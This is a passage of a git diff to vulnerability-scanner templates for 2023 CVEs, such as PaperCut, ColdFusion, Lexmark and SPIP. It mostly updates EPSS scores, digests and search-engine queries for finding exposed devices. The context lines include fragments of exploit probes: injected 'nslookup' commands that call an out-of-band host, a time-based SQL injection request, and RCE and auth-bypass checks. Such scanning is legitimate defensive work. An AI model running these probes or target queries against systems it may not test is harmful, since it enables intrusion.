4a0a00473045022100a3afd864f1bf88b796f687c498073126b9ad910191e003757e169f65977764d1022004c02947788e53dd7d2b89786adef8739e8b6268a4696b89e5d4371dcdeea76b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-25717.yaml b/http/cves/2023/CVE-2023-25717.yaml index d4d53fa150..8c972fe669 100644 --- a/http/cves/2023/CVE-2023-25717.yaml +++ b/http/cves/2023/CVE-2023-25717.yaml @@ -27,8 +27,11 @@ info: max-request: 1 vendor: ruckuswireless product: ruckus_wireless_admin - shodan-query: title:"ruckus wireless" + shodan-query: + - title:"ruckus wireless" + - http.title:"ruckus wireless" fofa-query: title="ruckus wireless" + google-query: intitle:"ruckus wireless" tags: cve2023,cve,ruckus,rce,kev,ruckuswireless http: @@ -43,4 +46,4 @@ http: - contains_all(to_lower(interactsh_request), 'user-agent','curl') - status_code_1 == 302 condition: and -# digest: 4a0a0047304502200deafea4ba54747e5bf0550af972b71e8b94a3fb9846f463fd3084ad5465d5f9022100fcafaf89869758bc5c5e6f633b28dbdfbb2c9cecdd09bf18269b8681b083b713:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 480a00453043021f1ea263cea2eed76bac36950b39862f66ac454feafa67b6a16e30db96437f7202200627aaf451e88594be1228645a9e55817113148c8a4c460d0c3e41dacf5e1c31:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-26035.yaml b/http/cves/2023/CVE-2023-26035.yaml index 6d904ca21a..388c0924b4 100644 --- a/http/cves/2023/CVE-2023-26035.yaml +++ b/http/cves/2023/CVE-2023-26035.yaml @@ -18,15 +18,18 @@ info: cvss-score: 9.8 cve-id: CVE-2023-26035 cwe-id: CWE-862 - epss-score: 0.97003 - epss-percentile: 0.99723 + epss-score: 0.96928 + epss-percentile: 0.99718 cpe: cpe:2.3:a:zoneminder:zoneminder:*:*:*:*:*:*:*:* metadata: verified: true max-request: 2 vendor: zoneminder product: zoneminder - shodan-query: html:"ZM - Login" + shodan-query: + - html:"ZM - Login" + - http.html:"zm - login" + fofa-query: body="zm - login" tags: cve,cve2023,rce,zoneminder,unauth,packetstorm flow: http(1) && http(2) @@ -56,4 +59,4 @@ http: - type: dsl dsl: - contains(interactsh_protocol, "dns") -# digest: 4a0a004730450221008b4a73452ed681a25f40c5d8e7147de5a1a677aa0219ecfccd0e91aa6d829e010220268da47753cbd7b38ff64871e15e81c9fea1d053df5af7339687863c544545f2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502201deb0e902ab9301973a9175dfbe3c92b2c8761d9afbe744306f431c855dc420c0221008c9d19f10daf8096c7490f8ae6fcf83176884e79179e9bc694da5f1640fae636:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-26067.yaml b/http/cves/2023/CVE-2023-26067.yaml index 21b9d3339d..43ebf22a7c 100644 --- a/http/cves/2023/CVE-2023-26067.yaml +++ b/http/cves/2023/CVE-2023-26067.yaml @@ -29,7 +29,9 @@ info: max-request: 1 vendor: lexmark product: cxtpc_firmware - shodan-query: "Server: Lexmark_Web_Server" + shodan-query: + - "Server: Lexmark_Web_Server" + - "server: lexmark_web_server" tags: cve2023,cve,printer,iot,lexmark variables: cmd: 'nslookup {{interactsh-url}}' @@ -51,4 +53,4 @@ http: - contains(body, 'Fax Trace Settings') - status_code == 200 condition: and -# digest: 490a00463044022055d1b7e4c95893decc3dab3d84fe9989e8494bc49b7e6b893d84cc1e4a048b7302207371bad702700e3d7e1d2e24c86e16fb9f9562046931dfcf368e5769c2c600ce:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022009a7f099ca76e35c9d48ea76db7ae39595b4d7d3b44ad22778601e262454a850022100a8825d87405a7a25934d002aa1f95fa710796416b6d3ffd9a412cc026d1c6294:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-26255.yaml b/http/cves/2023/CVE-2023-26255.yaml index ed2bac0af9..d943807728 100644 --- a/http/cves/2023/CVE-2023-26255.yaml +++ b/http/cves/2023/CVE-2023-26255.yaml @@ -21,15 +21,19 @@ info: cvss-score: 7.5 cve-id: CVE-2023-26255 cwe-id: CWE-22 - epss-score: 0.15138 - epss-percentile: 0.95663 + epss-score: 0.12537 + epss-percentile: 0.95441 cpe: cpe:2.3:a:stagil:stagil_navigation:*:*:*:*:*:jira:*:* metadata: max-request: 1 vendor: stagil product: stagil_navigation framework: jira - shodan-query: title:Jira + shodan-query: + - title:Jira + - http.title:jira + fofa-query: title=jira + google-query: intitle:jira tags: cve2023,cve,lfi,jira,cms,atlassian,stagil http: @@ -52,4 +56,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450221009eff1cfcd9afb5c04d7b263baaf2ff4faf43631d4e6eaf033ca3c6b8fd85de5d022060065320c9d8eac58e06f71ddabfeaecb433875fa230c89a4015e129415c44f3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100a674aef67c3412d1fa38a98b055ab9ee71ed7bad198dda4b281164d2f4b80ab70220197e5f174c77e9baea72903175072777dab179dcbe9a21b7752f14ddd6255549:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-26256.yaml b/http/cves/2023/CVE-2023-26256.yaml index 953ef7762d..8f995e821b 100644 --- a/http/cves/2023/CVE-2023-26256.yaml +++ b/http/cves/2023/CVE-2023-26256.yaml @@ -14,20 +14,26 @@ info: - https://github.com/1nters3ct/CVEs/blob/main/CVE-2023-26256.md - https://marketplace.atlassian.com/apps/1216090/stagil-navigation-for-jira-menus-themes?tab=overview&hosting=cloud - https://nvd.nist.gov/vuln/detail/CVE-2023-26256 + - https://github.com/0x7eTeam/CVE-2023-26256 + - https://github.com/ARPSyndicate/cvemon classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2023-26256 cwe-id: CWE-22 - epss-score: 0.00599 - epss-percentile: 0.76089 + epss-score: 0.01419 + epss-percentile: 0.86483 cpe: cpe:2.3:a:stagil:stagil_navigation:*:*:*:*:*:jira:*:* metadata: max-request: 1 vendor: stagil product: stagil_navigation framework: jira - shodan-query: title:Jira + shodan-query: + - title:Jira + - http.title:jira + fofa-query: title=jira + google-query: intitle:jira tags: cve,cve2023,lfi,jira,cms,atlassian,stagil http: @@ -49,4 +55,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402206f7621cf2a7737e42311ac572bb467a25f6560465b43af82ee9c969c46abe69702200c966cadb0385e22cc13c7c570a1cf029c3c48849d60dc56ac002c93b7bb9df3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402205a8bfd2d71eccd9ade34973bedfdf5cd932b0672b0b7aa7f6abc9b8419245c8202202d0b47e2cb4612494eedb4b97cb7d09a675e0e1b260d881a62a86038161686e3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-26347.yaml b/http/cves/2023/CVE-2023-26347.yaml index e713be332a..16cb3ea15c 100644 --- a/http/cves/2023/CVE-2023-26347.yaml +++ b/http/cves/2023/CVE-2023-26347.yaml @@ -16,16 +16,24 @@ info: cvss-score: 7.5 cve-id: CVE-2023-26347 cwe-id: CWE-284 - epss-score: 0.00466 - epss-percentile: 0.74969 + epss-score: 0.00415 + epss-percentile: 0.73972 cpe: cpe:2.3:a:adobe:coldfusion:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: adobe product: coldfusion - shodan-query: http.component:"Adobe ColdFusion" - fofa-query: app="Adobe-ColdFusion" + shodan-query: + - http.component:"Adobe ColdFusion" + - http.component:"adobe coldfusion" + - http.title:"coldfusion administrator login" + - cpe:"cpe:2.3:a:adobe:coldfusion" + fofa-query: + - app="Adobe-ColdFusion" + - app="adobe-coldfusion" + - title="coldfusion administrator login" + google-query: intitle:"coldfusion administrator login" tags: cve2023,cve,adobe,coldfusion,auth-bypass http: @@ -46,4 +54,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100ff9ea4c7bbd58eacf86b3cf227f3254dda5e64c7b988c29f30139e7ad99bb7a0022100e070f165193a71a78fb1a8a365556a407e03a9e1e1de475e39814e5196600017:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220369c99422e48defa25ecfd647f147650291c7119a47e0dc1e6ac7c604b326479022100aaaa20e9ba989242707c217de18b6debae9bb920d91261d03bf56e876020091e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-26360.yaml b/http/cves/2023/CVE-2023-26360.yaml index b6f89d0eb7..f8d8943427 100644 --- a/http/cves/2023/CVE-2023-26360.yaml +++ b/http/cves/2023/CVE-2023-26360.yaml @@ -21,15 +21,23 @@ info: cvss-score: 8.6 cve-id: CVE-2023-26360 cwe-id: CWE-284 - epss-score: 0.94391 - epss-percentile: 0.99045 + epss-score: 0.96298 + epss-percentile: 0.99537 cpe: cpe:2.3:a:adobe:coldfusion:2018:-:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: adobe product: coldfusion - shodan-query: http.component:"Adobe ColdFusion" + shodan-query: + - http.component:"Adobe ColdFusion" + - http.component:"adobe coldfusion" + - http.title:"coldfusion administrator login" + - cpe:"cpe:2.3:a:adobe:coldfusion" + fofa-query: + - title="coldfusion administrator login" + - app="adobe-coldfusion" + google-query: intitle:"coldfusion administrator login" tags: cve2023,cve,packetstorm,adobe,coldfusion,lfi,kev http: @@ -55,4 +63,4 @@ http: part: header words: - "text/html" -# digest: 4a0a0047304502205698995c249ffd4a99ec1e5e70748e5ff9b6672660456da63e2278057f774024022100cc2e426ca1958716eefc00654a4ef74b95883bc11134b574c4d717b24441305f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022049ae0d61b6974e768810d21126c80845b1073b3d24624d059acad02e830ca5630221008a177ec08fa27677755d03a81905a317a6c9abb094e4b8edc92c6194fb7a2992:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-26469.yaml b/http/cves/2023/CVE-2023-26469.yaml index c155f2d5ff..ae4d8808e5 100644 --- a/http/cves/2023/CVE-2023-26469.yaml +++ b/http/cves/2023/CVE-2023-26469.yaml @@ -21,8 +21,8 @@ info: cvss-score: 9.8 cve-id: CVE-2023-26469 cwe-id: CWE-22 - epss-score: 0.93768 - epss-percentile: 0.99071 + epss-score: 0.9424 + epss-percentile: 0.99175 cpe: cpe:2.3:a:jorani:jorani:1.0.0:*:*:*:*:*:*:* metadata: verified: true @@ -30,8 +30,8 @@ info: vendor: jorani product: jorani shodan-query: http.favicon.hash:-2032163853 + fofa-query: icon_hash=-2032163853 tags: cve2023,cve,jorani,rce,packetstorm - variables: payload: "" header: "{{to_upper(rand_base(12))}}" @@ -73,4 +73,4 @@ http: name: csrf regex: - 'name="csrf_test_jorani" value="(.*?)"' -# digest: 490a0046304402200b60e70c837357ee28e98935c27bde05998b539897928baabec57666aed0b919022046a262ba1607e583c4f6c3b067a69772bd79b9667dbbb3502fbd54561a7b73dd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502202d242b66bd8eb4a49f3a58f63f9c6f4636cbb06ed2385b224eb84a9a85fbafc7022100f669d3c8440de4b34277c09cef8b261b1bbd6dadbd1a721a75917f13fecba160:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-2648.yaml b/http/cves/2023/CVE-2023-2648.yaml index 3055c93f20..6715dfd9b4 100644 --- a/http/cves/2023/CVE-2023-2648.yaml +++ b/http/cves/2023/CVE-2023-2648.yaml @@ -21,15 +21,17 @@ info: cvss-score: 9.8 cve-id: CVE-2023-2648 cwe-id: CWE-434 - epss-score: 0.05365 - epss-percentile: 0.9293 + epss-score: 0.08638 + epss-percentile: 0.94483 cpe: cpe:2.3:a:weaver:e-office:9.5:*:*:*:*:*:*:* metadata: verified: true max-request: 2 vendor: weaver product: e-office - fofa-query: app="泛微-EOffice" + fofa-query: + - app="泛微-EOffice" + - app="泛微-eoffice" tags: cve2023,cve,weaver,eoffice,ecology,fileupload,rce,intrusive variables: file: '{{rand_base(5, "abc")}}' @@ -73,4 +75,4 @@ http: regex: - "([0-9]+)" internal: true -# digest: 4b0a00483046022100f76cac79e3bba79e1e24f553046c6c369b367e153c24c9819257afe6ce0581db022100cd45df2138e7ff3528e74590ed131eaa5439e053ac63e9b9aa40d6b2578c1fe6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100a44e0179362f362e905d1f609ac0e6b82953168cbcaa131defd1fd0d955a9ea4022100a1cebf6f55d89a80c2c0827b351c7ae189a38b42c694d472df9df4d44d960929:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-26842.yaml b/http/cves/2023/CVE-2023-26842.yaml index dd9f940192..90172f6baa 100644 --- a/http/cves/2023/CVE-2023-26842.yaml +++ b/http/cves/2023/CVE-2023-26842.yaml @@ -19,8 +19,8 @@ info: cvss-score: 5.4 cve-id: CVE-2023-26842 cwe-id: CWE-79 - epss-score: 0.00148 - epss-percentile: 0.49853 + epss-score: 0.00169 + epss-percentile: 0.53813 cpe: cpe:2.3:a:churchcrm:churchcrm:4.5.3:*:*:*:*:*:*:* metadata: verified: true @@ -61,4 +61,4 @@ http: regex: - 'id="form_session_token" value="(.*)" type="hidden"' internal: true -# digest: 4a0a00473045022100deca6566231b825072b920c7159063966ba0e0d72d70db60a9fa69ae05b1fbe5022073f4adad294645fff730e4db3d3115fd31616a4e889dc68aa57fbafd5817c833:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502204811c3399bdef9b6e0dd13a822ade7c6c9a78fa31bcbd88b7789937bc24c68150221008a9fefa1ec16084c87e7350bafea77fc13dc3b235e9ab50c4cc1728b4da014e8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-26843.yaml b/http/cves/2023/CVE-2023-26843.yaml index bb6939c7ab..a1623a94d7 100644 --- a/http/cves/2023/CVE-2023-26843.yaml +++ b/http/cves/2023/CVE-2023-26843.yaml @@ -21,8 +21,8 @@ info: cvss-score: 5.4 cve-id: CVE-2023-26843 cwe-id: CWE-79 - epss-score: 0.00146 - epss-percentile: 0.49668 + epss-score: 0.00264 + epss-percentile: 0.66076 cpe: cpe:2.3:a:churchcrm:churchcrm:4.5.3:*:*:*:*:*:*:* metadata: verified: true @@ -55,4 +55,4 @@ http: - 'contains(body_2, ">")' - 'contains(body_2, "ChurchCRM")' condition: and -# digest: 4b0a00483046022100a12d03c09c04ff3fd0eb21429cffd53dae7683b12ce3bbcf005f8d5e4320dfcd022100ac9beadeb589b7538505258a13544fe51ef33ad0ec8300d92680d1121b40dc06:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100d2a837a350a382a25d524a78a59886d5543fbb00360d0e233939ca64c61aee710220045d3121c7563ac0e22c73421256f86098bb2235f4dc56cf35be3f7996b56d37:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-27008.yaml b/http/cves/2023/CVE-2023-27008.yaml index 5135678151..86d08185e2 100644 --- a/http/cves/2023/CVE-2023-27008.yaml +++ b/http/cves/2023/CVE-2023-27008.yaml @@ -19,15 +19,18 @@ info: cvss-score: 6.1 cve-id: CVE-2023-27008 cwe-id: CWE-79 - epss-score: 0.00099 - epss-percentile: 0.39906 + epss-score: 0.00133 + epss-percentile: 0.48375 cpe: cpe:2.3:a:atutor:atutor:2.2.1:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: atutor product: atutor - shodan-query: http.html:"Atutor" + shodan-query: + - http.html:"Atutor" + - http.html:"atutor" + fofa-query: body="atutor" tags: cve,cve2023,xss,atutor http: @@ -57,4 +60,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100b34b512d32b022e240aa98f18a8d87185f4225c0d321f534cfa85def4ee3bc8602202a38b89f5ae73498ed2709a3fd2ad2b98df29a16fc00c3b155cf941e5d1b3276:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502207dc8656d646b7b14e075f0e7b4656ce61aaf7b2371f75c6c2c1b8a5445c399f4022100b4c39a836c6c147f818076bad19a1565e21fb5bac16ebfe8fdb050b6980d4264:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-27032.yaml b/http/cves/2023/CVE-2023-27032.yaml index a2441f835d..56fdaaaecf 100644 --- a/http/cves/2023/CVE-2023-27032.yaml +++ b/http/cves/2023/CVE-2023-27032.yaml @@ -14,17 +14,17 @@ info: cvss-score: 9.8 cve-id: CVE-2023-27032 cwe-id: CWE-89 - epss-score: 0.00106 - epss-percentile: 0.42495 + epss-score: 0.01979 + epss-percentile: 0.88753 cpe: cpe:2.3:a:idnovate:popup_module_\(on_entering\,_exit_popup\,_add_product\)_and_newsletter:*:*:*:*:*:prestashop:*:* metadata: - max-request: 1 - vendor: idnovate - product: popup_module_\(on_entering\,_exit_popup\,_add_product\)_and_newsletter - framework: prestashop - shodan-query: http.component:"prestashop" verified: true - tags: cve,cve2023,sqli,prestashop,advancedpopupcreator + max-request: 2 + vendor: idnovate + product: "popup_module_\\(on_entering\\,_exit_popup\\,_add_product\\)_and_newsletter" + framework: prestashop + shodan-query: "http.component:\"prestashop\"" + tags: cve,cve2023,sqli,prestashop,advancedpopupcreator,idnovate http: - raw: @@ -33,7 +33,7 @@ http: Host: {{Hostname}} - | - @timeout 10s + @timeout 20s POST /module/advancedpopupcreator/popup HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded @@ -43,7 +43,7 @@ http: matchers: - type: dsl dsl: - - duration>=6 + - duration_2>=6 - status_code == 200 - contains(content_type, "text/html") - contains_all(body, 'popups','hasError') @@ -63,4 +63,4 @@ http: regex: - ',"static_token":"([0-9a-z]+)",' internal: true -# digest: 4a0a00473045022100aa46ba83eaa1e937eb89a6c4296e4efd072af40a4bcf8e687f6f3ea2551ed66502204452a505bdad3d329e7fdb44f2aa4ad0a0be98e174650aed8a5f057d51935856:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220505e538de0a7417f495151e7828e4e9c1c60805ab390374202dae077362ff09a02201d031f84949b5d962b16a57aac4c5ab5c30b7785284dfd82a4916a01a3c318bc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-27034.yaml b/http/cves/2023/CVE-2023-27034.yaml index 8da52852e0..05662e23ae 100644 --- a/http/cves/2023/CVE-2023-27034.yaml +++ b/http/cves/2023/CVE-2023-27034.yaml @@ -21,8 +21,8 @@ info: cvss-score: 9.8 cve-id: CVE-2023-27034 cwe-id: CWE-89 - epss-score: 0.01365 - epss-percentile: 0.8596 + epss-score: 0.01204 + epss-percentile: 0.85171 cpe: cpe:2.3:a:joommasters:jms_blog:2.5.5:*:*:*:*:prestashop:*:* metadata: max-request: 2 @@ -80,4 +80,4 @@ http: - 'duration_1>=6' - 'contains(body_2, "Jms Blog")' condition: and -# digest: 4b0a0048304602210081fd270095a1404c3f7c68821fe46c6300eebf304f7a30088cec551889da6164022100ab7775c739fdba4a50da051bb34459f44f5affaff61c41d0febd3e14967c7bdc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100842f6d137227d9615048da5a7346e239d060859af380518f03f3b9afcc9d583102200f06aede5a783292f532ea71439283376b6140cade971197fc79d3dda174db61:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-27159.yaml b/http/cves/2023/CVE-2023-27159.yaml index fdb6f9b40e..35d7f0060d 100644 --- a/http/cves/2023/CVE-2023-27159.yaml +++ b/http/cves/2023/CVE-2023-27159.yaml @@ -21,15 +21,22 @@ info: cvss-score: 7.5 cve-id: CVE-2023-27159 cwe-id: CWE-918 - epss-score: 0.00258 - epss-percentile: 0.63515 + epss-score: 0.00418 + epss-percentile: 0.74069 cpe: cpe:2.3:a:appwrite:appwrite:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: appwrite product: appwrite - shodan-query: title:"Sign In - Appwrite" + shodan-query: + - title:"Sign In - Appwrite" + - http.title:"sign in - appwrite" + - http.favicon.hash:-633108100 + fofa-query: + - icon_hash=-633108100 + - title="sign in - appwrite" + google-query: intitle:"sign in - appwrite" tags: cve2023,cve,appwrite,ssrf,oast http: @@ -48,4 +55,4 @@ http: part: interactsh_request words: - "User-Agent: Appwrite-Server" -# digest: 4a0a0047304502210081af9d0fa841653c4d08863d80b449d96d7cc156c3cd2dfa6158234a730a4514022022d68c4ca6f83a4d3f5d24f0389e3e609c12a912a37a2a1382c063f62de56f7b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100ec6010a276c69eb1badd0cf67d2ca0282bd4c9a27aee843854130ee5365ae29c022100b27588948150ea31d45f27e2189ae144a614c2cb382c50ea4f82c4ea7477cde2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-27179.yaml b/http/cves/2023/CVE-2023-27179.yaml index 2b6d4f5c68..fcfc48d242 100644 --- a/http/cves/2023/CVE-2023-27179.yaml +++ b/http/cves/2023/CVE-2023-27179.yaml @@ -21,8 +21,8 @@ info: cvss-score: 7.5 cve-id: CVE-2023-27179 cwe-id: CWE-434 - epss-score: 0.01173 - epss-percentile: 0.83438 + epss-score: 0.02242 + epss-percentile: 0.89545 cpe: cpe:2.3:a:gdidees:gdidees_cms:*:*:*:*:*:*:*:* metadata: verified: true @@ -53,4 +53,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502202ed098aec99fb6f0ef97db4bc8923c33d44632198533143bc0941afabc069043022100e2d8ea18692381c14fd9825ea2dcbe02f49906b3c573b05a4c7a4e74d4022dd2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402202dd93e61d0ee307383828e3dbd0fa3207ab6f177ec8cf63a020a7d73aaa4e3cb02206562c141f0747ae18fd56df1db0ad6e9536ecab905b947438d1242949676d43d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-27292.yaml b/http/cves/2023/CVE-2023-27292.yaml index 7b63a1626c..e210ed82af 100644 --- a/http/cves/2023/CVE-2023-27292.yaml +++ b/http/cves/2023/CVE-2023-27292.yaml @@ -20,14 +20,18 @@ info: cve-id: CVE-2023-27292 cwe-id: CWE-601 epss-score: 0.00092 - epss-percentile: 0.37956 + epss-percentile: 0.39168 cpe: cpe:2.3:a:opencats:opencats:0.9.6:*:*:*:*:*:*:* metadata: verified: true max-request: 2 vendor: opencats product: opencats - shodan-query: title:"opencats" + shodan-query: + - title:"opencats" + - http.title:"opencats" + fofa-query: title="opencats" + google-query: intitle:"opencats" tags: cve2023,cve,authenticated,tenable,opencats,redirect http: @@ -55,4 +59,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100f9f53e3e452787d9724750d3608ce6b68eb37eb2bed9e816ce331a5b6b096969022100a08d99c502029867566a633e6b96973ec21e625d67f3506e7a58117d32a30a32:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220379d275a0c0be31a480cb13fc5046a010738ec45ed24aeaa8147bf1dcbe52d3e022100f89e28dc64c5bcf23fe7c11543aecacfd7d128530e7164dc05660d43031b34dc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-2732.yaml b/http/cves/2023/CVE-2023-2732.yaml index c539e62af0..43c754e585 100644 --- a/http/cves/2023/CVE-2023-2732.yaml +++ b/http/cves/2023/CVE-2023-2732.yaml @@ -21,8 +21,8 @@ info: cvss-score: 9.8 cve-id: CVE-2023-2732 cwe-id: CWE-288,NVD-CWE-Other - epss-score: 0.22111 - epss-percentile: 0.96037 + epss-score: 0.18921 + epss-percentile: 0.96241 cpe: cpe:2.3:a:inspireui:mstore_api:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -30,6 +30,9 @@ info: vendor: inspireui product: mstore_api framework: wordpress + publicwww-query: /wp-content/plugins/mstore-api/ + shodan-query: http.html:/wp-content/plugins/mstore-api/ + fofa-query: body=/wp-content/plugins/mstore-api/ tags: cve2023,cve,wordpress,wp,wp-plugin,auth-bypass,mstore-api,inspireui http: @@ -55,4 +58,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022074722a892bf238338051f9fb3a47cce0886edc1d9d30ec3a5021c0ecd11006f1022076a0ddee63a3dd22874ab38c61f047339e761aec7e499fcc94cffa02f1c32b99:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502210081d1e05e2ea2f33253a948d063e31fea25ee4bce0f49f8b2e5481a329495537c02202675bd676048cda1113692411f92fae65ab644597c7826749d0ec7ec6256e387:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-27350.yaml b/http/cves/2023/CVE-2023-27350.yaml index 0cfc201b3c..fc98faf4ce 100644 --- a/http/cves/2023/CVE-2023-27350.yaml +++ b/http/cves/2023/CVE-2023-27350.yaml @@ -21,15 +21,22 @@ info: cvss-score: 9.8 cve-id: CVE-2023-27350 cwe-id: CWE-284,NVD-CWE-Other - epss-score: 0.97243 - epss-percentile: 0.99812 + epss-score: 0.97107 + epss-percentile: 0.99783 cpe: cpe:2.3:a:papercut:papercut_mf:*:*:*:*:*:*:*:* metadata: verified: true max-request: 10 vendor: papercut product: papercut_mf - shodan-query: http.html:"PaperCut" + shodan-query: + - http.html:"PaperCut" + - http.html:"papercut" + - http.html:"content=\"papercut\"" + - cpe:"cpe:2.3:a:papercut:papercut_mf" + fofa-query: + - body="papercut" + - body="content=\"papercut\"" tags: cve2023,cve,packetstorm,papercut,rce,oast,unauth,kev variables: cmd: "nslookup {{interactsh-url}}" @@ -126,4 +133,4 @@ http: - 'erList\/selectPrinterCost&sp=([a-z0-9]+)">' internal: true part: body -# digest: 4a0a00473045022100c43bc6a64df519a04b0c32ae002356fe4d745056e646acc1f73d048219fc0fdd022019e36e542ac51a145ed37740864eba86659fd657e0d6d986377e75bd06ca13e1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220343c82342201668010f41bfcb0ce5e19faeb271ba730f272c3e18f0a64824d52022021a35706bfda1719735f49763621978327bed13735c8e781ab0cce01d47aec71:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-27372.yaml b/http/cves/2023/CVE-2023-27372.yaml index 01e85a8015..cb84d2444e 100644 --- a/http/cves/2023/CVE-2023-27372.yaml +++ b/http/cves/2023/CVE-2023-27372.yaml @@ -20,15 +20,19 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2023-27372 - epss-score: 0.97152 - epss-percentile: 0.99786 + epss-score: 0.97376 + epss-percentile: 0.99905 cpe: cpe:2.3:a:spip:spip:*:*:*:*:*:*:*:* metadata: verified: "true" max-request: 2 vendor: spip product: spip - shodan-query: html:"spip.php?page=backend" + shodan-query: + - html:"spip.php?page=backend" + - http.html:"spip.php?page=backend" + - cpe:"cpe:2.3:a:spip:spip" + fofa-query: body="spip.php?page=backend" tags: cve,cve2023,packetstorm,spip,rce http: @@ -71,4 +75,4 @@ http: regex: - '>PHP Version <\/td>([0-9.]+)' part: body_2 -# digest: 490a004630440220786d7c2a2e607ddcae695760633ce2fa3d1f8acd176f947e34e32b3b6e979f780220653af3d4cfc548d7a3c4e8873b45fd038152bf4a4b6496bd1376574cc0129caf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100d0c77ced102f6fb0687d4c015f0f3ca2d3e3850b68086b7172d1c7cb98c560c1022100f6f66aa67252c9894fb140aebd529e4938a5db1d320ef9110323e846d0022ac8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-27482.yaml b/http/cves/2023/CVE-2023-27482.yaml index d433ff5a11..c68fa39c97 100644 --- a/http/cves/2023/CVE-2023-27482.yaml +++ b/http/cves/2023/CVE-2023-27482.yaml @@ -22,15 +22,20 @@ info: cvss-score: 10 cve-id: CVE-2023-27482 cwe-id: CWE-287 - epss-score: 0.06421 - epss-percentile: 0.93017 + epss-score: 0.03385 + epss-percentile: 0.91419 cpe: cpe:2.3:a:home-assistant:home-assistant:*:*:*:*:*:*:*:* metadata: verified: true max-request: 3 vendor: home-assistant product: home-assistant - shodan-query: title:"Home Assistant" + shodan-query: + - title:"Home Assistant" + - http.title:"home assistant" + - cpe:"cpe:2.3:a:home-assistant:home-assistant" + fofa-query: title="home assistant" + google-query: intitle:"home assistant" tags: cve2023,cve,homeassistant,auth-bypass,rce,home-assistant http: @@ -65,4 +70,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402203099f51b6c29d9951ebbeea0226d34c46a55f9f81b5c49107101414fc2eab40902200dddf0dae1c97279adf3b04e93e7fbd9f74a481951149a2cdece3bc3ed44d82b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100a5c16ecf9af665f19806f43a62747283296e8a22c9f10f925bef453bc5fbcc7202202f54ecc00060156e6aaa5f52d37ab9f73c9c2042fa17e89d0bdddb4dbc0cd206:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git 